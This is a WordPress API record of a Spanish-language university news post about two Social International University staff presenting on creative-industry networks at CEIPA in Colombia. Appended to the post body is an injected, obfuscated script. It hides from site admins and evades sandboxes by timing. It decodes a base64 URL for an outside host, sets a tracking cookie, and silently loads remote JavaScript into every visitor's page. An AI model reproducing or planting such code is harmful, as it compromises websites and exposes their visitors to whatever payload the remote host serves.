{"id":7400,"date":"2023-09-01T10:53:32","date_gmt":"2023-09-01T10:53:32","guid":{"rendered":"https:\/\/wiuniversity.org\/live\/?p=7400"},"modified":"2026-04-19T03:30:06","modified_gmt":"2026-04-19T03:30:06","slug":"7400-2","status":"publish","type":"post","link":"https:\/\/wiuniversity.org\/live\/7400-2\/","title":{"rendered":"SIU y RIECC en CEIPA &#8211; Colombia"},"content":{"rendered":"<p>Entre el 21 y 24 de Agosto del 2023, Emilio Salom\u00f3n, Director General de Social International University y el Prof. Marcelo Decoud, Coordinador del \u00e1rea Audiovisual de SIU, presentaron sus ponencias en la universidad CEIPA, ubicada en su sede de Sabaneta, Antioquia, Colombia. El marco del evento fue dado por los observatorios de industrias creativas de las distintas regiones de Colombia, un pa\u00eds con un gran avance y referente en el \u00e1rea. Salom\u00f3n present\u00f3 el network educativo SIU-FIAM-IDCI-WIU y elForo Mundial 4.0, mientras que Decoud se refiri\u00f3 a la Red Iberoanericana de Industrias culturales y creativas RIECC. #riecc #fiam #siuniversity #wiuniversity #wf40<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Entre el 21 y 24 de Agosto del 2023, Emilio Salom\u00f3n, Director General de Social International University y el Prof. Marcelo Decoud, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7401,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-7400","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"_links":{"self":[{"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/posts\/7400","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/comments?post=7400"}],"version-history":[{"count":3,"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/posts\/7400\/revisions"}],"predecessor-version":[{"id":7517,"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/posts\/7400\/revisions\/7517"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/media\/7401"}],"wp:attachment":[{"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/media?parent=7400"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/categories?post=7400"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/wiuniversity.org\/live\/wp-json\/wp\/v2\/tags?post=7400"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}